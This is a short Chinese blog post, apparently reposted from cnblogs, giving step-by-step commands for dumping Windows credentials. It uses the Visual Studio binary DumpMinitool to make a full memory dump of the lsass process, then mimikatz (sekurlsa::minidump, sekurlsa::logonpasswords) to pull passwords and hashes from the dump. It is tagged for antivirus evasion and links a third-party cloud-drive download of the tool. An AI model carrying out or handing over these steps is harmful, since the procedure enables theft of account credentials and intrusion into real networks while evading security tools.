1.DumpMinitool获取地址
阿里云盘:https://www.aliyundrive.com/s/qk5zmwQm1Mj 提取码: hy87
DumpMinitool所在路径:
D:\XXX\VisualStudioPro_2022\VisualStudio\Common7\IDE\CommonExtensions\Microsoft\TestWindow\VsTest\Extensions\dump
找不见用everything 搜一下 DumpMinitool
2.mimikatz
下载地址:
https://github.com/gentilkiwi/mimikatz
3.DumpMinitool + mimikatz
3.1 获取 lsass进程 PID
tasklist | findstr "lsass"
3.2 DumpHash
DumpMinitool.exe --file lsass.dmp --processId 512 --dumpType Full
--file 输出的路径
--processId lsass.exe进程的ID
--dumpType 方式
3.3 本地使用mimikatz解析
mimikatz.exe
sekurlsa::minidump "lsass.dmp"
sekurlsa::logonpasswords
标签:exe,免杀,dump,--,Studio2022,lsass,mimikatz,DumpMinitool From: https://www.cnblogs.com/1nit/p/17261892.html大于等于server 2012抓取明文,详见 xxx